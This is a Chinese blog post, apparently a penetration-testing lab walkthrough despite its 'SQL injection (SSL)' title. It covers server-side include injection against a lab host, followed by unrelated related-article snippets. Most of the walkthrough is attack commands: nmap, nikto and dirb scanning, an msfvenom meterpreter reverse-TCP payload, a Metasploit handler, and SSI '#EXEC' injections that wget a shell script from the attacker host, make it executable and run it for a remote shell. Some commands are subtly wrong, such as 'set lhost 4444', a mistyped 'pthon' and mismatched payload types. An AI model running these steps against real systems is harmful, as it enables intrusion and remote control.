SQL注入(SSL)

news/2024/12/22 21:06:21/
信息探测扫描主机服务信息以及服务版本nmap -sV 192.168.101.54快速扫描主机全部信息nmap -T4 -A -v  192.168.101.54探测敏感信息nikto -host http://192.168.101.54dirb http://192.168.101.54登录浏览器:192.168.101.54根据dirb进行网址挨个探测根据提示来利用对应SSL注入漏洞制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.54 lport=4444 -f rawgedit shell.py启动监听
msfconsole
use exploit/multi/handler 
set payload python/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lhost 4444
run返回浏览器
用户名输入1
密码输入<!--#EXEC cmd="wget http://192.168.101.51/shell.py" --> 然后将shell复制到/var/www/html中
mv shell.py /var/www/html再然后开启apache服务
service apache2 start再次返回浏览器
密码<!--#EXEC cmd="chmod 777 shell.py" -->
密码<!--#EXEC cmd="pthon shell.py" -->执行操作
sysinfo		查看系统信息
shell		进入系统shell
优化界面
python -c "import pty;pty.spawn('/bin/bash')"

http://www.ppmy.cn/news/1122827.html

相关文章

【Python从入门到进阶】36、Selenium 动作交互

接上篇《35、selenium基本语法学习》 上一篇我们介绍了selenium的基本语法&#xff0c;包括元素定位以及访问元素信息的操作。本篇我们来学习selenium操作网页的动作内容。 一、什么是selenium动作操作 动作操作是指使用Selenium调用WebDriver执行与用户交互相关的动作&#…

Docker CMD指令如何覆写

在Dockerfile里,CMD指令是可以被覆盖的。 在构建镜像时,可以通过docker build命令的–cmd选项覆盖Dockerfile的CMD: 例如: FROM ubuntu CMD ["echo","hello"]构建时覆盖CMD: docker build -t test --cmd "echo world" .在创建容器时,可以通过…

C/C++算法入门 | 日期处理

不爱生姜不吃醋⭐️ 如果本文有什么错误的话欢迎在评论区中指正 与其明天开始&#xff0c;不如现在行动&#xff01; 文章目录 &#x1f334;前言&#x1f334;日期处理1.题目&#xff08;codeup 1928&#xff09;2.思路3.代码实现 &#x1f334;总结 &#x1f334;前言 日期处…

Django框架介绍和安装

Django框架介绍和安装 组件&#xff1a; 基本配置文件/路由器 模型层&#xff08;M&#xff09;/模板层&#xff08;T&#xff09;/视图层&#xff08;v&#xff09; Cookie和Seesion 分页及发邮件 Admin管理后台 init.py:Python包的初始化文件 wsgi.py:WEB服务网关的配…

《动手学深度学习 Pytorch版》 7.1 深度卷积神经网络(AlexNet)

7.1.1 学习表征 深度卷积神经网络的突破出现在2012年。突破可归因于以下两个关键因素&#xff1a; 缺少的成分&#xff1a;数据 数据集紧缺的情况在 2010 年前后兴起的大数据浪潮中得到改善。ImageNet 挑战赛中&#xff0c;ImageNet数据集由斯坦福大学教授李飞飞小组的研究人…

项目开发过程中遇到了什么困难?

1.需求最初是什么样的&#xff1f; 2.如何挖掘的需求&#xff0c;挖掘后真实的需求是什么样的&#xff1f; 3.我们做了那些调查&#xff1f; 4.我们给出了那些方案&#xff0c;优缺点是什么&#xff1f; 5.根据实际情况&#xff0c;老板的期望&#xff0c;最终我们选择的什…

1022 D进制的A+B

一.问题&#xff1a; 输入两个非负 10 进制整数 A 和 B (≤230−1)&#xff0c;输出 AB 的 D (1<D≤10)进制数。 输入格式&#xff1a; 输入在一行中依次给出 3 个整数 A、B 和 D。 输出格式&#xff1a; 输出 AB 的 D 进制数。 输入样例&#xff1a; 123 456 8输出样…

软件系统的测试方法

软件系统测试是确保软件质量和功能的关键步骤&#xff0c;选择适当的测试方法取决于项目的性质、需求和资源可用性。通常&#xff0c;综合运用多种测试方法可以更全面地评估软件系统的质量和性能。下面列举了一些常见的软件系统测试方法&#xff0c;希望对大家有所帮助。北京木…